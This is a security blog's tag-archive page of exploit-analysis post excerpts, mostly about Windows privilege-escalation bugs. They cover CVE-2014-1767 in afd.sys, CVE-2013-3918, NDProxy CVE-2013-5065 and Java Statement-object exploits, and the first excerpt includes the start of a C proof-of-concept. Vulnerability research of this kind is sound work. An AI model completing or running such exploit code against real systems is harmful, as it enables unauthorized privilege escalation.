标签归档 » Exploit

CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit

Hint: Click Me for English Version [0x00].简介   首先想说的是,之所以分析这个漏洞有几个原因,(1)据载此漏洞在’2014黑客奥斯卡奖Pwnie Awards’中被评为最佳提权漏洞之首(AFD.sys Dangling Pointer Vulnerability (CVE-2014-1767))。(2) 这个漏洞是一个double free类型漏洞,比较有意思 (3) 迄今只有老外发了一份writeup讲解思路,还没有成功的exp放出,有的探索。本文会从poc开始在windows7 x86平台进行漏洞的原理分析以及实现一个尽量完善的提权利用:)。 [0x01]. 漏洞原理分析 A. 初窥 我们最权威也是最给力的参考资料就是下面的这个PDF文件。 http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf 我们根据pdf的描述得到以下poc。本实验所有操作都在windows 7 (6.1.7601) 32位系统上完成。 ================================================= #include <windows.h> #include <stdio.h> #pragma comment(lib, “WS2_32.lib”)   int main() {     DWORD targetSize = 0×310 ;     DWORD virtualAddress = 0×13371337 ;     DWORD mdlSize=(0×4000*(targetSize-0×30)/8)-0xFFF-(virtualAddress& 0xFFF) ;     static DWORD inbuf1[100] ;     memset(inbuf1, 0, sizeof(inbuf1)) ;     inbuf1[6]  = virtualAddress ;     inbuf1[7]  = mdlSize ;     inbuf1[10] = 1 ;     static DWORD inbuf2[100] ;     memset(inbuf2, 0, sizeof(inbuf2)) ;     inbuf2[0] = 1 ;     inbuf2[1] = 0x0AAAAAAA ;     WSADATA      WSAData ;     SOCKET       s ;     sockaddr_in  sa ;     int          ierr ;     …..

CVE-2013-3918 exploit analysis

Last month, Fireeye catch a 0day attack which the MS assigned CVE-2013-3918 to. Basically, this 0day may be in the wild more than one year. We can find the sample in here http://jsunpack.jeek.org/?report=0fe86b1a6fc27dbd4134d96e68b9153682cc6831. And Metasploit also release a module which can work on winxp+ie8. Now I will give a deeply analysis for this vulnerability.

NDProxy Local SYSTEM exploit(CVE-2013-5065)

Recently I post the blog The Shellcode Used in the latest Zero Day Attack Analysis (CVE-2013-5065&CVE-2013-3346) which include the cve-2013-5065 exploit code. And if you read carefully, you can find the details. Now I transfer the assembly code to c code. If execute successfully, it can pop a calc.exe with SYSTEM Privilege. Have fun!

New Native Java Exploit Method Using Statement Object Analysis

In the blackhat 2013, ZDI publish a paper about the US-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices. In this white paper, they mention a new way to exploit the native java vulnerability, which using the Statement Object can easily bypass the DEP and ASLR. But how do they do it. Recently, the Packet Storm Security published two new Native Java Vulnerabilities Exploits using the Statement Class. And we can find the detail from them. I will explain the details for you!